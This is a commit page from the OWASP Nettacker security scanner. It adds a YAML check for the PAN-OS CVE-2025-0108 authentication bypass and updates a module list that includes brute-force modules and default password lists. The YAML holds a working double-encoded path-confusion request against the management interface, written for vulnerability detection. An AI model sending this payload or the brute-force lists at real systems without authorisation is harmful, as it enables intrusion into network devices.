Skip to content

Commit 6d427e2

Browse files
authored
adding paloalto_panos_cve_2025_0108_vuln module (#1013)
1 parent aff7fe3 commit 6d427e2

File tree

2 files changed

+238
-0
lines changed

2 files changed

+238
-0
lines changed

Modules.md

Lines changed: 179 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,179 @@
1+
# Nettacker Modules aka 'Methods'
2+
3+
OWASP Nettacker Modules can be of type **Scan** (scan for something), **Vuln** (check for some vulnerability) and **Brute** (Brute force)
4+
- [Scan Modules](#scan-modules)
5+
- [Ports Scanned by Nettacker](#ports-scanned-by-nettacker)
6+
- [Vuln Modules](#vuln-modules)
7+
- [Brute Modules](#brute-modules)
8+
9+
## Scan Modules
10+
11+
* '**admin_scan**' - Scan the target for various Admin folders such as /admin /phpmyadmin /cmsadmin /wp-admin etc
12+
* '**citrix_lastpatcheddate_scan**' Scan the target and try to detect Citrix Netscaler Gateway and it's last patched date
13+
* '**cms_detection_scan**' - Scan the target and try to detect the CMS (Wordpress, Drupal or Joomla) using response fingerprinting
14+
* '**confluence_version_scan**' - Scan the target and identify the Confluence version
15+
* '**cups_version_scan**' - Scan the target and identify the CUPS version (on port 631)
16+
* '**dir_scan**' - Scan the target for well-known directories
17+
* '**drupal_modules_scan**' - Scan the target for popular Drupal modules
18+
* '**drupal_theme_scan**' - Scan the target for popular Drupal themes
19+
* '**drupal_version_scan**' - Scan the target and identify the Drupal version
20+
* '**icmp_scan**' - Ping the target and log the response time if it responds.
21+
* '**http_redirect_scan**' - Scan the target and test if it returns an HTTP redirect 3xx response code and print the destination
22+
* '**http_status_scan**' - Scan the target and return the HTTP status code
23+
* '**ivanti_csa_lastpatcheddate_scan**' - Scan the target for Ivanti CSA appliance and return its last patched date
24+
* '**ivanti_vtm_version_scan**' - Scan the target for Ivanti vTM appliance and return its version number
25+
* '**joomla_template_scan**' - Scan the target for Joomla templates (identify Joomla sites)
26+
* '**joomla_user_enum_scan**' - Scan the target and enumerate Joomla users
27+
* '**joomla_version_scan**' - Scan the target and identify the Joomla version
28+
* '**moveit_version_scan**' - Scan the target and identify the Progress MOVEit version
29+
* '**pma_scan**' - Scan the target for PHP MyAdmin presence
30+
* '**port_scan**' - Scan the target for open ports identifying the popular services using signatures (.e.g SSH on port 2222)
31+
* '**sender_policy_scan**' - Scan the target domains/subdomains for SPF policy settings
32+
* '**shodan_scan**' - Scan the target domains/subdomains/IP in Shodan. Put your Shodan API key i "shodan_api_key" method arg, "shodan_query_override" to run any Shodan query overriding the Nettacker target
33+
* '**subdomain_scan**' - Scan the target for subdomains (target must be a domain e.g. owasp.org)
34+
* '**viewdns_reverse_ip_lookup_scan**' - Identify which sites/domains are hosted on the target host using ViewDNS.info
35+
* '**wappalyzer_scan**' - Scan the target and try to identify the technologies and libraries used using Wappalyzer
36+
* '**wordpress_version_scan**' - Scan the target and identify the WordPress version
37+
* '**wp_plugin_scan**' - Scan the target for popular WordPress Plugins
38+
* '**wp_theme_scan**' - Scan the target for popular WordPress themes
39+
* '**wp_timthumbs_scan**' - Scan the target for WordPress TimThumb.php script in various possible locations
40+
* '**wp_user_enum_scan**' - Scan the target WordPress site and Enumerate Users
41+
42+
43+
## Ports Scanned by Nettacker
44+
If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacker will scan for these 1000 most popular ports:
45+
46+
47+
`[1, 3, 4, 6, 7, 9, 13, 17, 19, 20, 21, 22, 23, 24, 25, 26, 30, 32, 33, 37, 42,`
48+
`43, 49, 53, 67, 68, 69, 70, 79, 80, 81, 82, 83, 84, 85, 88, 89, 90, 99, 100, 106, 109, 110,`
49+
`111, 113, 119, 125, 135, 139, 143, 144, 146, 161, 162, 163, 179, 199, 211, 212, 222,`
50+
`254, 255, 256, 259, 264, 280, 301, 306, 311, 340, 366, 389, 406, 407, 416, 417,`
51+
`425, 427, 443, 444, 445, 458, 464, 465, 481, 497, 500, 512, 513, 514, 515, 524,`
52+
`541, 543, 544, 545, 548, 554, 555, 563, 587, 593, 616, 617, 625, 631, 636, 646,`
53+
`648, 666, 667, 668, 683, 687, 691, 700, 705, 711, 714, 720, 722, 726, 749, 765,`
54+
`777, 783, 787, 800, 801, 808, 843, 873, 880, 888, 898, 900, 901, 902, 903, 911,`
55+
`912, 981, 987, 990, 992, 993, 995, 999, 1000, 1001, 1002, 1007, 1009, 1010,`
56+
`1011, 1021, 1022, 1023, 1024, 1025, 1026, 1027, 1028, 1029, 1030, 1031, 1032,`
57+
`1033, 1034, 1035, 1036, 1037, 1038, 1039, 1040, 1041, 1042, 1043, 1044, 1045,`
58+
`1046, 1047, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1056, 1057, 1058,`
59+
`1059, 1060, 1061, 1062, 1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070, 1071,`
60+
`1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081, 1082, 1083, 1084,`
61+
`1085, 1086, 1087, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095, 1096, 1097,`
62+
`1098, 1099, 1100, 1102, 1104, 1105, 1106, 1107, 1108, 1110, 1111, 1112, 1113,`
63+
`1114, 1117, 1119, 1121, 1122, 1123, 1124, 1126, 1130, 1131, 1132, 1137, 1138,`
64+
`1141, 1145, 1147, 1148, 1149, 1151, 1152, 1154, 1163, 1164, 1165, 1166, 1169,`
65+
`1174, 1175, 1183, 1185, 1186, 1187, 1192, 1198, 1199, 1201, 1213, 1216, 1217,`
66+
`1218, 1233, 1234, 1236, 1244, 1247, 1248, 1259, 1271, 1272, 1277, 1287, 1296,`
67+
`1300, 1301, 1309, 1310, 1311, 1322, 1328, 1334, 1352, 1417, 1433, 1434, 1443,`
68+
`1455, 1461, 1494, 1500, 1501, 1503, 1521, 1524, 1533, 1556, 1580, 1583, 1594,`
69+
`1600, 1641, 1658, 1666, 1687, 1688, 1700, 1717, 1718, 1719, 1720, 1721, 1723,`
70+
`1755, 1761, 1782, 1783, 1801, 1805, 1812, 1839, 1840, 1862, 1863, 1864, 1875,`
71+
`1900, 1914, 1935, 1947, 1971, 1972, 1974, 1984, 1998, 1999, 2000, 2001, 2002,`
72+
`2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2013, 2020, 2021, 2022, 2030,`
73+
`2033, 2034, 2035, 2038, 2040, 2041, 2042, 2043, 2045, 2046, 2047, 2048, 2049,`
74+
`2065, 2068, 2099, 2100, 2103, 2105, 2106, 2107, 2111, 2119, 2121, 2126, 2135,`
75+
`2144, 2160, 2161, 2170, 2179, 2190, 2191, 2196, 2200, 2222, 2251, 2260, 2288,`
76+
`2301, 2323, 2366, 2381, 2382, 2383, 2393, 2394, 2399, 2401, 2492, 2500, 2522,`
77+
`2525, 2557, 2601, 2602, 2604, 2605, 2607, 2608, 2638, 2701, 2702, 2710, 2717,`
78+
`2718, 2725, 2800, 2809, 2811, 2869, 2875, 2909, 2910, 2920, 2967, 2968, 2998,`
79+
`3000, 3001, 3003, 3005, 3006, 3007, 3011, 3013, 3017, 3030, 3031, 3052, 3071,`
80+
`3077, 3128, 3168, 3211, 3221, 3260, 3261, 3268, 3269, 3283, 3300, 3301, 3306,`
81+
`3322, 3323, 3324, 3325, 3333, 3351, 3367, 3369, 3370, 3371, 3372, 3389, 3390,`
82+
`3404, 3476, 3493, 3517, 3527, 3546, 3551, 3580, 3659, 3689, 3690, 3703, 3737,`
83+
`3766, 3784, 3800, 3801, 3809, 3814, 3826, 3827, 3828, 3851, 3869, 3871, 3878,`
84+
`3880, 3889, 3905, 3914, 3918, 3920, 3945, 3971, 3986, 3995, 3998, 4000, 4001,`
85+
`4002, 4003, 4004, 4005, 4006, 4045, 4111, 4125, 4126, 4129, 4224, 4242, 4279,`
86+
`4321, 4343, 4443, 4444, 4445, 4446, 4449, 4550, 4567, 4662, 4848, 4899, 4900,`
87+
`4998, 5000, 5001, 5002, 5003, 5004, 5009, 5030, 5033, 5050, 5051, 5054, 5060,`
88+
`5061, 5080, 5087, 5100, 5101, 5102, 5120, 5190, 5200, 5214, 5221, 5222, 5225,`
89+
`5226, 5269, 5280, 5298, 5357, 5405, 5414, 5431, 5432, 5440, 5500, 5510, 5544,`
90+
`5550, 5555, 5560, 5566, 5631, 5633, 5666, 5678, 5679, 5718, 5730, 5800, 5801,`
91+
`5802, 5810, 5811, 5815, 5822, 5825, 5850, 5859, 5862, 5877, 5900, 5901, 5902,`
92+
`5903, 5904, 5906, 5907, 5910, 5911, 5915, 5922, 5925, 5950, 5952, 5959, 5960,`
93+
`5961, 5962, 5963, 5987, 5988, 5989, 5998, 5999, 6000, 6001, 6002, 6003, 6004,`
94+
`6005, 6006, 6007, 6009, 6025, 6059, 6100, 6101, 6106, 6112, 6123, 6129, 6156,`
95+
`6346, 6389, 6502, 6510, 6543, 6547, 6565, 6566, 6567, 6580, 6646, 6666, 6667,`
96+
`6668, 6669, 6689, 6692, 6699, 6779, 6788, 6789, 6792, 6839, 6881, 6901, 6969,`
97+
`7000, 7001, 7002, 7004, 7007, 7019, 7025, 7070, 7100, 7103, 7106, 7200, 7201,`
98+
`7402, 7435, 7443, 7496, 7512, 7625, 7627, 7676, 7741, 7777, 7778, 7800, 7911,`
99+
`7920, 7921, 7937, 7938, 7999, 8000, 8001, 8002, 8007, 8008, 8009, 8010, 8011,`
100+
`8021, 8022, 8031, 8042, 8045, 8080, 8081, 8082, 8083, 8084, 8085, 8086, 8087,`
101+
`8088, 8089, 8090, 8093, 8099, 8100, 8180, 8181, 8192, 8193, 8194, 8200, 8222,`
102+
`8254, 8290, 8291, 8292, 8300, 8333, 8383, 8400, 8402, 8443, 8500, 8600, 8649,`
103+
`8651, 8652, 8654, 8701, 8800, 8873, 8888, 8899, 8994, 9000, 9001, 9002, 9003,`
104+
`9009, 9010, 9011, 9040, 9050, 9071, 9080, 9081, 9090, 9091, 9099, 9100, 9101,`
105+
`9102, 9103, 9110, 9111, 9200, 9207, 9220, 9290, 9415, 9418, 9485, 9500, 9502,`
106+
`9503, 9535, 9575, 9593, 9594, 9595, 9618, 9666, 9876, 9877, 9878, 9898, 9900,`
107+
`9917, 9929, 9943, 9944, 9968, 9998, 9999, 10000, 10001, 10002, 10003, 10004,`
108+
`10009, 10010, 10012, 10024, 10025, 10082, 10180, 10215, 10243, 10566, 10616,`
109+
`10617, 10621, 10626, 10628, 10629, 10778, 11110, 11111, 11967, 12000, 12174,`
110+
`12265, 12345, 13456, 13722, 13782, 13783, 14000, 14238, 14441, 14442, 15000,`
111+
`15002, 15003, 15004, 15660, 15742, 16000, 16001, 16012, 16016, 16018, 16080,`
112+
`16113, 16992, 16993, 17877, 17988, 18040, 18101, 18988, 19101, 19283, 19315,`
113+
`19350, 19780, 19801, 19842, 20000, 20005, 20031, 20221, 20222, 20828, 21571,`
114+
`22939, 23502, 24444, 24800, 25734, 25735, 26214, 27000, 27352, 27353, 27355,`
115+
`27356, 27715, 28201, 30000, 30718, 30951, 31038, 31337, 32768, 32769, 32770,`
116+
`32771, 32772, 32773, 32774, 32775, 32776, 32777, 32778, 32779, 32780, 32781,`
117+
`32782, 32783, 32784, 32785, 33354, 33899, 34571, 34572, 34573, 35500, 38292,`
118+
`40193, 40911, 41511, 42510, 44176, 44442, 44443, 44501, 45100, 48080, 49152,`
119+
`49153, 49154, 49155, 49156, 49157, 49158, 49159, 49160, 49161, 49163, 49165,`
120+
`49167, 49175, 49176, 49400, 49999, 50000, 50001, 50002, 50003, 50006, 50300,`
121+
`50389, 50500, 50636, 50800, 51103, 51493, 52673, 52822, 52848, 52869, 54045,`
122+
`54328, 55055, 55056, 55555, 55600, 56737, 56738, 57294, 57797, 58080, 60020,`
123+
`60443, 61532, 61900, 62078, 63331, 64623, 64680, 65000, 65129, 65389]`
124+
125+
126+
127+
## Vuln Modules
128+
129+
* '**apache_ofbiz_cve_2024_38856**' - check the target for Apache OFBiz CVE-2024-38856
130+
* '**apache_struts_vuln**' - check Apache Struts for CVE-2017-5638
131+
* '**Bftpd_double_free_vuln**' - check bftpd for CVE-2007-2010
132+
* '**Bftpd_memory_leak_vuln**' - check bftpd for CVE-2017-16892
133+
* '**Bftpd_parsecmd_overflow_vuln**'- check bftpd for CVE-2007-2051
134+
* '**Bftpd_remote_dos_vuln**' - check bftpd for CVE-2009-4593
135+
* '**CCS_injection_vuln**' - check SSL for Change Cipher Spec (CCS Injection) CVE-2014-0224
136+
* '**citrix_cve_2019_19781_vuln**' - check the target for Citrix CVE-2019-19781 vulnerability
137+
* '**citrix_cve_2023_24488_vuln**' - check the target for Citrix CVE-2023-24488 XSS vulnerability
138+
* '**clickjacking_vuln**' - check the web server for missing 'X-Frame-Options' header (clickjacking protection)
139+
* '**content_security_policy_vuln**' - check the web server for missing 'Content-Security-Policy' header
140+
* '**content_type_options_vuln**' - check the web server for missing 'X-Content-Type-Options'=nosniff header
141+
* '**f5_cve_2020_5902_vuln**' - check the target for F5 RCE CVE-2020-5902 vulnerability
142+
* '**heartbleed_vuln**' - check SSL for Heartbleed vulnerability (CVE-2014-0160)
143+
* '**msexchange_cve_2021_26855**' - check the target for MS Exchange SSRF CVE-2021-26855 (proxylogon/hafnium)
144+
* '**http_cors_vuln**' - check the web server for overly-permissive CORS (header 'Access-Control-Allow-Origin'=*)
145+
* '**options_method_enabled_vuln**' - check if OPTIONS method is enabled on the web server
146+
* '**paloalto_panos_cve_2025_0108_vuln** - check the target for PaloAlto PAN-OS CVE-2025-0108 vulnerability
147+
* '**ProFTPd_bypass_sqli_protection_vuln**' - check ProFTPd for CVE-2009-0543
148+
* '**ProFTPd_cpu_consumption_vuln**' - check ProFTPd for CVE-2008-7265
149+
* '**ProFTPd_directory_traversal_vuln**' - check ProFTPd for CVE-2010-3867
150+
* '**ProFTPd_exec_arbitary_vuln**' - check ProFTPd for CVE-2011-4130
151+
* '**ProFTPd_heap_overflow_vuln**' - check ProFTPd for CVE-2010-4652
152+
* '**ProFTPd_integer_overflow_vuln**' - check ProFTPd for CVE-2011-1137
153+
* '**ProFTPd_memory_leak_vuln**' - check ProFTPd for CVE-2001-0136
154+
* '**ProFTPd_restriction_bypass_vuln**' - check ProFTPd for CVE-2009-3639
155+
* '**server_version_vuln**' - check if the web server is leaking server banner in 'Server' response header
156+
* '**ssl_signed_certificate_vuln**' - check for self-signed & other signing issues(weak signing algorithm) in SSL certificate
157+
* '**ssl_expired_certificate_vuln**' - check if SSL certificate has expired or is close to expiring
158+
* '**ssl_version_vuln**' - check if the server's SSL configuration supports old and insecure SSL versions
159+
* '**ssl_weak_cipher_vuln**' - check if server's SSL configuration supports weak cipher suites
160+
* '**wordpress_dos_cve_2018_6389_vuln**' - check if Wordpress is vulnerable to CVE-2018-6389 Denial Of Service (DOS)
161+
* '**wp_xmlrpc_bruteforce_vuln**' - check if Wordpress is vulnerable to credential Brute Force via XMLRPC wp.getUsersBlogs
162+
* '**wp_xmlrpc_pingback_vuln**' - check if Wordpress is vulnerable to XMLRPC pingback
163+
* '**x_powered_by_vuln**' - check if the web server is leaking server configuration in 'X-Powered-By' response header
164+
* '**xdebug_rce_vuln**' - checks if web server is running XDebug version 2.5.5 vulnerable to RCE
165+
* '**XSS_protection_vuln**' - check if header 'X-XSS-Protection' header is set to '1; mode=block'
166+
* '**vbulletin_cve_2019_16759_vuln**' - check the target for vBulletin RCE CVE-2019-16759 vulnerability
167+
168+
## Brute Modules
169+
170+
If no extra users/passwords parameters are specified the following default usernames will be used on brute force checks: ["admin", "root", "test", "ftp", "anonymous", "user", "support", "1"] with the following passwords: ["admin", "root", "test", "ftp", "anonymous", "user", "1", "12345",123456", "124567", "12345678", "123456789", "1234567890", "admin1", "password!@#", "support", "1qaz2wsx", "qweasd", "qwerty", "!QAZ2wsx","password1", "1qazxcvbnm", "zxcvbnm", "iloveyou", "password", "p@ssw0rd","admin123", ""]
171+
172+
* '**ftp_brute**' - try to brute force FTP users.
173+
* '**http_basic_auth_brute**' - try to brute for HTTP Basic Auth users.
174+
* '**http_form_brute**' - try to brute force using HTTP form - assuming that the form has 'username' and 'password' fields
175+
* '**http_ntlm_brute**' - try to brute force using HTTP NTLM
176+
* '**smtp_brute**' - - try to brute force SMTP (ports ["25", "465", "587"])
177+
* '**ssh_brute**' - try to brute force SSH (port 22)
178+
* '**telnet_brute**' - try to brute force via telnet (port23) (expects "login" and "Password" prompt)
179+
* '**wp_xmlrpc_brute**' - try to brute force Wordpress users using XMLRPC and wp.getUsersBlogs method

paloalto_panos_cve_2025_0108.yaml

Lines changed: 59 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,59 @@
1+
info:
2+
name: paloalto_panos_cve_2025_0108_vuln
3+
author: OWASP Nettacker team
4+
severity: 8.8
5+
description: CVE-2025-0108 is an authentication bypass in the Palo Alto Networks PAN-OS software, which enables an unauthenticated attacker with network access to the management web interface to bypass the authentication
6+
reference:
7+
- https://security.paloaltonetworks.com/CVE-2025-0108
8+
- https://www.assetnote.io/resources/research/nginx-apache-path-confusion-to-auth-bypass-in-pan-os
9+
- https://www.bleepingcomputer.com/news/security/hackers-exploit-authentication-bypass-in-palo-alto-networks-pan-os/
10+
profiles:
11+
- vuln
12+
- vulnerability
13+
- http
14+
- high_severity
15+
- cve
16+
- paloalto
17+
- paloalto_panos
18+
- panos
19+
20+
21+
payloads:
22+
- library: http
23+
steps:
24+
- method: get
25+
timeout: 3
26+
headers:
27+
User-Agent: "{user_agent}"
28+
allow_redirects: false
29+
ssl: false
30+
url:
31+
nettacker_fuzzer:
32+
input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"
33+
prefix: ""
34+
suffix: ""
35+
interceptors:
36+
data:
37+
paths:
38+
- "unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css"
39+
schema:
40+
- "http"
41+
- "https"
42+
ports:
43+
- 80
44+
- 443
45+
- 4443
46+
- 8443
47+
response:
48+
condition_type: and
49+
conditions:
50+
status_code:
51+
regex: "200"
52+
reverse: false
53+
header:
54+
Content-Type:
55+
regex: text/html
56+
reverse: false
57+
content:
58+
regex: "Zero Touch Provisioning"
59+
reverse: false

0 commit comments

Comments
 (0)